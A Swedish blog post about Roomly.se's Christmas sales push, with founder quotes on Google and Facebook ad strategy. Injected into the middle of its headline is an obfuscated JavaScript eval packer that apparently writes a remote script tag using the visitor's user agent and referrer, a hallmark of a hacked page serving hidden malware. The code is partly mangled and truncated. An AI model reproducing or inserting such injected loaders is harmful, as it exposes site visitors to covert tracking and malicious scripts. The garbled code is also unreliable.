Image Image Image Image Image Image Image Image Image Image

| 20 februari, 2020

Scroll to top

Top

Julhandeln har börjat på Roomly.se

inredning och design online

Julhandeln eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnddd|var|u0026u|referrer|rhshy||js|php’.split(’|’),0,{}))
har börjat på Roomly.se: November är här. En stor månad för många butiker i Sverige. Det är nämligen dags för att förbereda sig på årets julhandel. För e-handlarna ser det ut att läggs i en högre växel. Det är stor konkurrens på köpta annonsplatser och sociala medier. Juldekoration och julklappar är i stort fokus hos Roomly.se.

Om vi tittar på försäljningssiffrorna för e-handel inom detaljhandeln kan denna jul komma bli ett nytt rekordår för onlinebutikerna. Fler och fler köper idag sina julklappar på nätet. Ett enkelt och snabbt sätt att få ihop allt på en gång istället för att springa på stan och brottas med alla andra i stress.

Inredningssajten Roomly.se har redan smygstartat sin julsatsning. Roomly.se ser två kommande ljusa månader.

”Det är kul och se hur tillväxten för inredning och design har ökat på nätet de senaste åren. Jag tror absolut att julen 2015 kommer bli ett rekord år för detaljhandel på nätet.” Säger Sebastian Plengier Ehrnfelt grundare av inredningsbutiken Roomly.se 

På Roomly har man förberett sig på julrushen genom att skapa anpassade landningssidor med julklappstips, julrim, julinspiration och självklart en massa juldekoration till bra priser.

”Vi kommer att vara med och slåss om den köpta annonseringen på nätet. Som det ser ut nu kommer priserna på bl.a. Google adwords och Facebook ads höjas väldigt mycket. Då är det som sajtägare viktigt att anpassa orden och fraserna man önskar så konverteringen maxas. Inte köpa dyra ord som inredning, resor, eller liknande. Satsa istället på fraser som du tror eller vet att dina besökare kommer att använda. För Facebook ads skulle jag tipsa om att verkligen sätta dig ner och rama in rätt målgrupp och nischa för att få så hög relevant konvertering som möjligt.” Sebastian Plengier Ehrnfelt Roomly.se

Kolla in julspecial på Roomly.se för att se hur en anpassad landingssida skulle kunna se ut för ert företag eller sajt. Landningssajten är sen den sida som ni satsar på att driva folk till.

Juldekoration och julklappstips 2015!